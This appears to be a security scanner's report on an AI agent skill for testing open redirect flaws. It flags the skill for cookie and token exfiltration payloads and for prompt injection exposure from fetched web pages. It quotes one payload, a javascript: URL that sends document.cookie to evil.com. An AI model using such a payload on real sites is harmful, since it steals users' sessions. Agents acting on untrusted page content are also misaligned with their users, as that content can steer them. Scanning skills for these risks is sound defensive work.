testing-for-open-redirect-vulnerabilities

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 0.90). The content is dual-use but contains explicit, actionable guidance and payloads for credential/token exfiltration and phishing (e.g., javascript:fetch('https://evil.com/?c='+document.cookie), OAuth redirect_uri chaining, data: and javascript: payloads), which meaningfully enables malicious abuse despite being presented as a testing tool.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill clearly fetches and interprets arbitrary external web pages: scripts/agent.py issues HTTP requests to user-supplied target URLs and parses Location headers and resp.text (and SKILL.md shows curl examples against target.com), so untrusted third-party content directly influences test decisions and subsequent actions.